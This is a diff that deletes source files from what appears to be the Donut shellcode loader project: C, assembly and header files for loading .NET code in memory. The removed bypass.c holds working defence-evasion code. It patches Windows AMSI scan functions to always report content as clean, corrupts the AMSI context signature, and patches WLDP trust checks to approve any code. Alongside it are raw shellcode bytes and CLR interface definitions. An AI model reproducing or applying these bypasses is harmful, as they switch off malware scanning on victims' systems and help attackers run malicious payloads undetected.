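-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IAmsiStream * This,
-REFIID riid,
-void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IAmsiStream * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IAmsiStream * This);
-
-HRESULT ( STDMETHODCALLTYPE *GetAttribute )(
-IAmsiStream * This,
-AMSI_ATTRIBUTE attribute,
-ULONG dataSize,
-unsigned char *data,
-ULONG *retData);
-
-HRESULT ( STDMETHODCALLTYPE *Read )(
-IAmsiStream * This,
-ULONGLONG position,
-ULONG size,
-unsigned char *buffer,
-ULONG *readSize);
-
-END_INTERFACE
-} IAmsiStreamVtbl;
-
-typedef struct _IAmsiStream {
-IAmsiStreamVtbl *lpVtbl;
-} AmsiStream;
-
-typedef struct IAntimalwareProviderVtbl {
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IAntimalwareProvider * This,
-REFIID riid,
-void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IAntimalwareProvider * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IAntimalwareProvider * This);
-
-HRESULT ( STDMETHODCALLTYPE *Scan )(
-IAntimalwareProvider * This,
-IAmsiStream *stream,
-AMSI_RESULT *result);
-
-void ( STDMETHODCALLTYPE *CloseSession )(
-IAntimalwareProvider * This,
-ULONGLONG session);
-
-HRESULT ( STDMETHODCALLTYPE *DisplayName )(
-IAntimalwareProvider * This,
-LPWSTR *displayName);
-
-END_INTERFACE
-} IAntimalwareProviderVtbl;
-
-typedef struct _IAntimalwareProvider {
-IAntimalwareProviderVtbl *lpVtbl;
-} AntimalwareProvider;
-
-typedef struct IAntimalwareVtbl {
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface)(
-IAntimalware *This,
-REFIID riid,
-void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IAntimalware * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IAntimalware * This);
-
-HRESULT ( STDMETHODCALLTYPE *Scan )(
-IAntimalware * This,
-IAmsiStream *stream,
-AMSI_RESULT *result,
-IAntimalwareProvider **provider);
-
-void ( STDMETHODCALLTYPE *CloseSession )(
-IAntimalware * This,
-ULONGLONG session);
-
-END_INTERFACE
-} IAntimalwareVtbl;
-
-typedef struct _IAntimalware {
-IAntimalwareVtbl *lpVtbl;
-} Antimalware;
-
-typedef struct tagHAMSICONTEXT {
-DWORD Signature; // "AMSI" or 0x49534D41
-PWCHAR AppName; // set by AmsiInitialize
-IAntimalware *Antimalware; // set by AmsiInitialize
-DWORD SessionCount; // increased by AmsiOpenSession
-} _HAMSICONTEXT, *_PHAMSICONTEXT;
-
-#endif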
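--- a/payload/bypass.c
+++ b/payload/bypass.c
@@ -1,373 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-typedef enum _WLDP_HOST_ID {
-WLDP_HOST_ID_UNKNOWN = 0,
-WLDP_HOST_ID_GLOBAL = 1,
-WLDP_HOST_ID_VBA = 2,
-WLDP_HOST_ID_WSH = 3,
-WLDP_HOST_ID_POWERSHELL = 4,
-WLDP_HOST_ID_IE = 5,
-WLDP_HOST_ID_MSI = 6,
-WLDP_HOST_ID_MAX = 7
-} WLDP_HOST_ID, *PWLDP_HOST_ID;
-
-typedef struct _WLDP_HOST_INFORMATION {
-DWORD dwRevision;
-WLDP_HOST_ID dwHostId;
-PCWSTR szSource;
-HANDLE hSource;
-} WLDP_HOST_INFORMATION, *PWLDP_HOST_INFORMATION;
-
-#if defined(BYPASS_AMSI_A)
-
-// fake function that always returns S_OK and AMSI_RESULT_CLEAN
-HRESULT WINAPI AmsiScanBufferStub(
-HAMSICONTEXT amsiContext,
-PVOID buffer,
-ULONG length,
-LPCWSTR contentName,
-HAMSISESSION amsiSession,
-AMSI_RESULT *result)
-{
-*result = AMSI_RESULT_CLEAN;
-return S_OK;
-}
-
-// This function is never called. It's simply used to calculate
-// the length of AmsiScanBufferStub above.
-//
-// The reason it performs a multiplication is because MSVC can identify
-// functions that perform the same operation and eliminate duplicates
-// from the compiled code. Null subroutines are eliminated.
-
-int AmsiScanBufferStubEnd(int a, int b) {
-return a * b;
-}
-
-// fake function that always returns S_OK and AMSI_RESULT_CLEAN
-HRESULT WINAPI AmsiScanStringStub(
-HAMSICONTEXT amsiContext,
-LPCWSTR string,
-LPCWSTR contentName,
-HAMSISESSION amsiSession,
-AMSI_RESULT *result)
-{
-*result = AMSI_RESULT_CLEAN;
-return S_OK;
-}
-
-int AmsiScanStringStubEnd(int a, int b) {
-return a + b;
-}
-
-BOOL DisableAMSI(PDONUT_INSTANCE inst) {
-HMODULE dll;
-DWORD len, op, t;
-LPVOID cs;
-
-// try load amsi. if unable, assume DLL doesn't exist
-// and return TRUE to indicate it's okay to continue
-dll = inst->api.LoadLibraryA(inst->amsi.s);
-if(dll == NULL) return TRUE;
-
-// resolve address of AmsiScanBuffer. if not found,
-// return FALSE because it should exist ...
-cs = inst->api.GetProcAddress(dll, inst->amsiScanBuf);
-if(cs == NULL) return FALSE;
-
-// calculate length of stub
-len = (ULONG_PTR)AmsiScanBufferStubEnd -
-(ULONG_PTR)AmsiScanBufferStub;
-
-DPRINT("Length of AmsiScanBufferStub is %" PRIi32 " bytes.", len);
-
-// check for negative length. this would only happen when
-// compiler decides to re-order functions.
-if((int)len < 0) return FALSE;
-
-// make the memory writeable. return FALSE on error
-if(!inst->api.VirtualProtect(
-cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
-
-DPRINT("Overwriting AmsiScanBuffer");
-// over write with virtual address of stub
-Memcpy(cs, ADR(PCHAR, AmsiScanBufferStub), len);
-// set memory back to original protection
-inst->api.VirtualProtect(cs, len, op, &t);
-
-// resolve address of AmsiScanString. if not found,
-// return FALSE because it should exist ...
-cs = inst->api.GetProcAddress(dll, inst->amsiScanStr);
-if(cs == NULL) return FALSE;
-
-// calculate length of stub
-len = (ULONG_PTR)AmsiScanStringStubEnd -
-(ULONG_PTR)AmsiScanStringStub;
-
-DPRINT("Length of AmsiScanStringStub is %" PRIi32 " bytes.", len);
-
-// check for negative length. this would only happen when
-// compiler decides to re-order functions.
-if((int)len < 0) return FALSE;
-
-// make the memory writeable
-if(!inst->api.VirtualProtect(
-cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
-
-DPRINT("Overwriting AmsiScanString");
-// over write with virtual address of stub
-Memcpy(cs, ADR(PCHAR, AmsiScanStringStub), len);
-// set memory back to original protection
-inst->api.VirtualProtect(cs, len, op, &t);
-
-return TRUE;
-}
-
-#elif defined(BYPASS_AMSI_B)
-
-BOOL DisableAMSI(PDONUT_INSTANCE inst) {
-HMODULE dll;
-PBYTE cs;
-DWORD i, op, t;
-BOOL disabled = FALSE;
-PDWORD Signature;
-
-// try load amsi. if unable to load, assume
-// it doesn't exist and return TRUE to indicate
-// it's okay to continue.
-dll = inst->api.LoadLibraryA(inst->amsi.s);
-if(dll == NULL) return TRUE;
-
-// resolve address of AmsiScanBuffer. if unable, return
-// FALSE because it should exist.
-cs = (PBYTE)inst->api.GetProcAddress(dll, inst->amsiScanBuf);
-if(cs == NULL) return FALSE;
-
-// scan for signature
-for(i=0;;i++) {
-Signature = (PDWORD)&cs[i];
-// is it "AMSI"?
-if(*Signature == inst->amsi.w[0]) {
-// set memory protection for write access
-inst->api.VirtualProtect(cs, sizeof(DWORD),
-PAGE_EXECUTE_READWRITE, &op);
-
-// change signature
-*Signature++;
-
-// set memory back to original protection
-inst->api.VirtualProtect(cs, sizeof(DWORD), op, &t);
-disabled = TRUE;
-break;
-}
-}
-return disabled;
-}
-
-#elif defined(BYPASS_AMSI_C)
-
-// Attempt to find AMSI context in .data section of CLR.dll
-// Could also scan PEB.ProcessHeap for this..
-// Disabling AMSI via AMSI context is based on idea by Matt Graeber
-// https://gist.github.com/mattifestation/ef0132ba4ae3cc136914da32a88106b9
-
-BOOL DisableAMSI(PDONUT_INSTANCE inst) {
-LPVOID clr;
-BOOL disabled = FALSE;
-PIMAGE_DOS_HEADER dos;
-PIMAGE_NT_HEADERS nt;
-PIMAGE_SECTION_HEADER sh;
-DWORD i, j, res;
-PBYTE ds;
-MEMORY_BASIC_INFORMATION mbi;
-_PHAMSICONTEXT ctx;
-
-// get address of CLR.dll. if unable, this
-// probably isn't a dotnet assembly being loaded
-clr = inst->api.GetModuleHandleA(inst->clr);
-if(clr == NULL) return FALSE;
-
-dos = (PIMAGE_DOS_HEADER)clr;
-nt = RVA2VA(PIMAGE_NT_HEADERS, clr, dos->e_lfanew);
-sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
-nt->FileHeader.SizeOfOptionalHeader);
-
-// scan all writeable segments while disabled == FALSE
-for(i = 0;
-i < nt->FileHeader.NumberOfSections && !disabled;
-i++)
-{
-// if this section is writeable, assume it's data
-if (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE) {
-// scan section for pointers to the heap
-ds = RVA2VA (PBYTE, clr, sh[i].VirtualAddress);
-
-for(j = 0;
-j < sh[i].Misc.VirtualSize - sizeof(ULONG_PTR);
-j += sizeof(ULONG_PTR))
-{
-// get pointer
-ULONG_PTR ptr = *(ULONG_PTR*)&ds[j];
-// query if the pointer
-res = inst->api.VirtualQuery((LPVOID)ptr, &mbi, sizeof(mbi));
-if(res != sizeof(mbi)) continue;
-
-// if it's a pointer to heap or stack
-if ((mbi.State == MEM_COMMIT ) &&
-(mbi.Type == MEM_PRIVATE ) &&
-(mbi.Protect == PAGE_READWRITE))
-{
-ctx = (_PHAMSICONTEXT)ptr;
-// check if it contains the signature
-if(ctx->Signature == inst->amsi.w[0]) {
-// corrupt it
-ctx->Signature++;
-disabled = TRUE;
-break;
-}
-}
-}
-}
-}
-return disabled;
-}
-
-#elif defined(BYPASS_AMSI_D)
-// This is where you may define your own AMSI bypass.
-// To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_AMSI_C defined.
-
-BOOL DisableAMSI(PDONUT_INSTANCE inst) {
-
-}
-
-#endif
-
-#if defined(BYPASS_WLDP_A)
-
-// fake function that always returns S_OK and isApproved = TRUE
-HRESULT WINAPI WldpIsClassInApprovedListStub(
-REFCLSID classID,
-PWLDP_HOST_INFORMATION hostInformation,
-PBOOL isApproved,
-DWORD optionalFlags)
-{
-*isApproved = TRUE;
-return S_OK;
-}
-
-// make sure prototype is different from other null subroutines
-// to avoid duplication by MSVC
-int WldpIsClassInApprovedListStubEnd(int a, int b) {
-return a - b;
-}
-
-// fake function that always returns S_OK
-HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
-HANDLE fileHandle,
-PVOID baseImage,
-ULONG ImageSize)
-{
-return S_OK;
-}
-
-int WldpQueryDynamicCodeTrustStubEnd(int a, int b) {
-return a / b;
-}
-
-BOOL DisableWLDP(PDONUT_INSTANCE inst) {
-HMODULE wldp;
-DWORD len, op, t;
-LPVOID cs;
-
-// try load wldp. if unable, assume DLL doesn't exist
-// and return TRUE to indicate it's okay to continue
-wldp = inst->api.LoadLibraryA(inst->wldp);
-if(wldp == NULL) return TRUE;
-
-// resolve address of WldpQueryDynamicCodeTrust
-// if not found, return FALSE because it should exist
-cs = inst->api.GetProcAddress(wldp, inst->wldpQuery);
-if(cs == NULL) return FALSE;
-
-// calculate length of stub
-len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
-(ULONG_PTR)WldpQueryDynamicCodeTrustStub;
-
-DPRINT("Length of WldpQueryDynamicCodeTrustStub is %" PRIi32 " bytes.", len);
-
-// check for negative length. this would only happen when
-// compiler decides to re-order functions.
-if((int)len < 0) return FALSE;
-
-// make the memory writeable. return FALSE on error
-if(!inst->api.VirtualProtect(
-cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
-
-// overwrite with virtual address of stub
-Memcpy(cs, ADR(PCHAR, WldpQueryDynamicCodeTrustStub), len);
-// set back to original protection
-inst->api.VirtualProtect(cs, len, op, &t);
-
-// resolve address of WldpIsClassInApprovedList
-// if not found, return FALSE because it should exist
-cs = inst->api.GetProcAddress(wldp, inst->wldpIsApproved);
-if(cs == NULL) return FALSE;
-
-// calculate length of stub
-len = (ULONG_PTR)WldpIsClassInApprovedListStubEnd -
-(ULONG_PTR)WldpIsClassInApprovedListStub;
-
-DPRINT("Length of WldpIsClassInApprovedListStub is %" PRIi32 " bytes.", len);
-
-// check for negative length. this would only happen when
-// compiler decides to re-order functions.
-if((int)len < 0) return FALSE;
-
-// make the memory writeable. return FALSE on error
-if(!inst->api.VirtualProtect(
-cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
-
-// overwrite with virtual address of stub
-Memcpy(cs, ADR(PCHAR, WldpIsClassInApprovedListStub), len);
-// set back to original protection
-inst->api.VirtualProtect(cs, len, op, &t);
-
-return TRUE;
-}
-#elif defined(BYPASS_WLDP_B)
-// This is where you may define your own WLDP bypass.
-// To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_WLDP_B defined.
-
-BOOL DisableWLDP(PDONUT_INSTANCE inst) {
-
-}
-#endif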
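--- a/payload/call_api.asm
+++ b/payload/call_api.asm
@@ -1,121 +0,0 @@
-;
-; Copyright © 2019 TheWover, Odzhan. All Rights Reserved.
-;
-; Redistribution and use in source and binary forms, with or without
-; modification, are permitted provided that the following conditions are
-; met:
-;
-; 1. Redistributions of source code must retain the above copyright
-; notice, this list of conditions and the following disclaimer.
-;
-; 2. Redistributions in binary form must reproduce the above copyright
-; notice, this list of conditions and the following disclaimer in the
-; documentation and/or other materials provided with the distribution.
-;
-; 3. The name of the author may not be used to endorse or promote products
-; derived from this software without specific prior written permission.
-;
-; THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
-; IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-; WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-; DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
-; INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
-; (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-; SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
-; HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
-; STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-; ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-; POSSIBILITY OF SUCH DAMAGE.
-;
-;
-; void call_api(FARPROC api, int param_cnt, WCHAR param[]);
-
-%define DONUT_MAX_PARAM 8
-%define DONUT_MAX_NAME 256
-
-struc HOME_SPACE
-._rcx resq 1
-._rdx resq 1
-._r8 resq 1
-._r9 resq 1
-endstruc
-
-struc _ds
-.hs: resq HOME_SPACE_size
-
-.arg4 resq 1
-.arg5 resq 1
-.arg6 resq 1
-.arg7 resq 1
-
-._rdi resq 1
-._rsi resq 1
-._rbp resq 1
-._rbx resq 1
-._rsp resq 1
-endstruc
-
-%ifndef BIN
-global call_api
-global _call_api
-%endif
-
-call_api:
-_call_api:
-bits 32
-
-; int3
-
-xor eax, eax ;
-dec eax ;
-jns L2 ; if SF=0, goto x64
-
-mov eax, [esp+ 4] ; eax = api address
-mov ecx, [esp+ 8] ; ecx = param_cnt
-mov edx, [esp+12] ; edx = params
-L1:
-push edx ; save params[i] on stack
-add edx, DONUT_MAX_NAME * 2 ; advance to next element
-sub ecx, 1 ; subtract one from param_cnt
-jnz L1
-call eax ; call api
-ret
-
-L2:
-bits 64
-
-sub rsp, ((_ds_size & -16) + 16) - 8
-
-mov [rsp+_ds._rbp], rbp
-mov [rsp+_ds._rbx], rbx
-mov [rsp+_ds._rdi], rdi
-mov [rsp+_ds._rsi], rsi
-
-mov rsi, rsp ; rsi = rsp after allocation
-mov rdi, rcx ; rdi = api to call
-mov eax, DONUT_MAX_NAME * 2
-
-mov rcx, r8 ; rcx = param[0]
-lea rdx, [rcx+rax] ; rdx = param[1]
-lea r8, [rdx+rax] ; r8 = param[2]
-lea r9, [r8+rax] ; r9 = param[3]
-
-lea rbx, [r9+rax]
-mov [rsp+_ds.arg4], rbx ; param[4]
-add rbx, rax
-mov [rsp+_ds.arg5], rbx ; param[5]
-add rbx, rax
-mov [rsp+_ds.arg6], rbx ; param[6]
-add rbx, rax
-mov [rsp+_ds.arg7], rbx ; param[7]
-call rdi
-
-mov rsp, rsi ; restore rsp after allocation
-mov rsi, [rsp+_ds._rsi]
-mov rdi, [rsp+_ds._rdi]
-mov rbx, [rsp+_ds._rbx]
-mov rbp, [rsp+_ds._rbp]
-
-add rsp, ((_ds_size & -16) + 16) - 8
-ret
-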
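--- a/payload/call_api_bin.h
+++ b/payload/call_api_bin.h
@@ -1,50 +0,0 @@
-
-unsigned int CALL_API_BIN[47];
-
-CALL_API_BIN[0] = 0x7948C031;
-CALL_API_BIN[1] = 0x24448B1B;
-CALL_API_BIN[2] = 0x244C8B04;
-CALL_API_BIN[3] = 0x24548B08;
-CALL_API_BIN[4] = 0xC281520C;
-CALL_API_BIN[5] = 0x00000200;
-CALL_API_BIN[6] = 0x7501E983;
-CALL_API_BIN[7] = 0xC3D0FFF4;
-CALL_API_BIN[8] = 0x48EC8148;
-CALL_API_BIN[9] = 0x48000001;
-CALL_API_BIN[10] = 0x3024AC89;
-CALL_API_BIN[11] = 0x48000001;
-CALL_API_BIN[12] = 0x38249C89;
-CALL_API_BIN[13] = 0x48000001;
-CALL_API_BIN[14] = 0x2024BC89;
-CALL_API_BIN[15] = 0x48000001;
-CALL_API_BIN[16] = 0x2824B489;
-CALL_API_BIN[17] = 0x48000001;
-CALL_API_BIN[18] = 0x8948E689;
-CALL_API_BIN[19] = 0x0200B8CF;
-CALL_API_BIN[20] = 0x894C0000;
-CALL_API_BIN[21] = 0x148D48C1;
-CALL_API_BIN[22] = 0x048D4C01;
-CALL_API_BIN[23] = 0x0C8D4D02;
-CALL_API_BIN[24] = 0x1C8D4900;
-CALL_API_BIN[25] = 0x9C894801;
-CALL_API_BIN[26] = 0x00010024;
-CALL_API_BIN[27] = 0xC3014800;
-CALL_API_BIN[28] = 0x249C8948;
-CALL_API_BIN[29] = 0x00000108;
-CALL_API_BIN[30] = 0x48C30148;
-CALL_API_BIN[31] = 0x10249C89;
-CALL_API_BIN[32] = 0x48000001;
-CALL_API_BIN[33] = 0x8948C301;
-CALL_API_BIN[34] = 0x0118249C;
-CALL_API_BIN[35] = 0xD7FF0000;
-CALL_API_BIN[36] = 0x48F48948;
-CALL_API_BIN[37] = 0x2824B48B;
-CALL_API_BIN[38] = 0x48000001;
-CALL_API_BIN[39] = 0x2024BC8B;
-CALL_API_BIN[40] = 0x48000001;
-CALL_API_BIN[41] = 0x38249C8B;
-CALL_API_BIN[42] = 0x48000001;
-CALL_API_BIN[43] = 0x3024AC8B;
-CALL_API_BIN[44] = 0x48000001;
-CALL_API_BIN[45] = 0x0148C481;
-CALL_API_BIN[46] = 0x00C30000;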
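--- a/payload/clib.c
+++ b/payload/clib.c
@@ -1,74 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#include <inttypes.h>
-#include <stddef.h>
-
-// functions to replace intrinsic C library functions
-
-// funnily enough, MSVC still tries to replace this
-// with memset hence the use of assembly..
-void *Memset (void *ptr, int value, size_t num) {
-
-#ifdef _MSC_VER
-__stosb(ptr, value, num);
-#else
-unsigned char *p = (unsigned char*)ptr;
-
-while(num--) {
-*p = value;
-p++;
-}
-#endif
-return ptr;
-}
-
-void *Memcpy (void *destination, const void *source, size_t num) {
-unsigned char *out = (unsigned char*)destination;
-unsigned char *in = (unsigned char*)source;
-
-while(num--) {
-*out = *in;
-out++; in++;
-}
-return destination;
-}
-
-int Memcmp(const void *ptr1, const void *ptr2, size_t num) {
-register const unsigned char *s1 = (const unsigned char*)ptr1;
-register const unsigned char *s2 = (const unsigned char*)ptr2;
-
-while (num-- > 0) {
-if (*s1++ != *s2++)
-return s1[-1] < s2[-1] ? -1 : 1;
-}
-return 0;
-}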
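--- a/payload/clr.h
+++ b/payload/clr.h
@@ -1,916 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#ifndef CLR_H
-#define CLR_H
-
-typedef struct _ICLRMetaHost ICLRMetaHost;
-typedef struct _ICLRRuntimeInfo ICLRRuntimeInfo;
-typedef struct _ICorRuntimeHost ICorRuntimeHost;
-typedef struct _ICorConfiguration ICorConfiguration;
-typedef struct _IGCThreadControl IGCThreadControl;
-typedef struct _IGCHostControl IGCHostControl;
-typedef struct _IDebuggerThreadControl IDebuggerThreadControl;
-typedef struct _AppDomain IAppDomain;
-typedef struct _Assembly IAssembly;
-typedef struct _Type IType;
-typedef struct _Binder IBinder;
-typedef struct _MethodInfo IMethodInfo;
-
-typedef void *HDOMAINENUM;
-
-typedef HRESULT ( __stdcall *CLRCreateInstanceFnPtr )(
-REFCLSID clsid,
-REFIID riid,
-LPVOID *ppInterface);
-
-typedef HRESULT ( __stdcall *CreateInterfaceFnPtr )(
-REFCLSID clsid,
-REFIID riid,
-LPVOID *ppInterface);
-
-
-typedef HRESULT ( __stdcall *CallbackThreadSetFnPtr )( void);
-
-typedef HRESULT ( __stdcall *CallbackThreadUnsetFnPtr )( void);
-
-typedef void ( __stdcall *RuntimeLoadedCallbackFnPtr )(
-ICLRRuntimeInfo *pRuntimeInfo,
-CallbackThreadSetFnPtr pfnCallbackThreadSet,
-CallbackThreadUnsetFnPtr pfnCallbackThreadUnset);
-
-#undef DUMMY_METHOD
-#define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This)
-
-typedef struct _BinderVtbl {
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IBinder * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */ void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IBinder * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IBinder * This);
-
-DUMMY_METHOD(GetTypeInfoCount);
-DUMMY_METHOD(GetTypeInfo);
-DUMMY_METHOD(GetIDsOfNames);
-DUMMY_METHOD(Invoke);
-DUMMY_METHOD(ToString);
-DUMMY_METHOD(Equals);
-DUMMY_METHOD(GetHashCode);
-DUMMY_METHOD(GetType);
-DUMMY_METHOD(BindToMethod);
-DUMMY_METHOD(BindToField);
-DUMMY_METHOD(SelectMethod);
-DUMMY_METHOD(SelectProperty);
-DUMMY_METHOD(ChangeType);
-DUMMY_METHOD(ReorderArgumentArray);
-} BinderVtbl;
-
-typedef struct _Binder {
-BinderVtbl *lpVtbl;
-} Binder;
-
-#undef DUMMY_METHOD
-#define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAppDomain *This)
-
-typedef struct _AppDomainVtbl {
-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IAppDomain * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */ void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IAppDomain * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IAppDomain * This);
-
-DUMMY_METHOD(GetTypeInfoCount);
-DUMMY_METHOD(GetTypeInfo);
-DUMMY_METHOD(GetIDsOfNames);
-DUMMY_METHOD(Invoke);
-
-DUMMY_METHOD(ToString);
-DUMMY_METHOD(Equals);
-DUMMY_METHOD(GetHashCode);
-DUMMY_METHOD(GetType);
-DUMMY_METHOD(InitializeLifetimeService);
-DUMMY_METHOD(GetLifetimeService);
-DUMMY_METHOD(Evidence);
-DUMMY_METHOD(add_DomainUnload);
-DUMMY_METHOD(remove_DomainUnload);
-DUMMY_METHOD(add_AssemblyLoad);
-DUMMY_METHOD(remove_AssemblyLoad);
-DUMMY_METHOD(add_ProcessExit);
-DUMMY_METHOD(remove_ProcessExit);
-DUMMY_METHOD(add_TypeResolve);
-DUMMY_METHOD(remove_TypeResolve);
-DUMMY_METHOD(add_ResourceResolve);
-DUMMY_METHOD(remove_ResourceResolve);
-DUMMY_METHOD(add_AssemblyResolve);
-DUMMY_METHOD(remove_AssemblyResolve);
-DUMMY_METHOD(add_UnhandledException);
-DUMMY_METHOD(remove_UnhandledException);
-DUMMY_METHOD(DefineDynamicAssembly);
-DUMMY_METHOD(DefineDynamicAssembly_2);
-DUMMY_METHOD(DefineDynamicAssembly_3);
-DUMMY_METHOD(DefineDynamicAssembly_4);
-DUMMY_METHOD(DefineDynamicAssembly_5);
-DUMMY_METHOD(DefineDynamicAssembly_6);
-DUMMY_METHOD(DefineDynamicAssembly_7);
-DUMMY_METHOD(DefineDynamicAssembly_8);
-DUMMY_METHOD(DefineDynamicAssembly_9);
-DUMMY_METHOD(CreateInstance);
-DUMMY_METHOD(CreateInstanceFrom);
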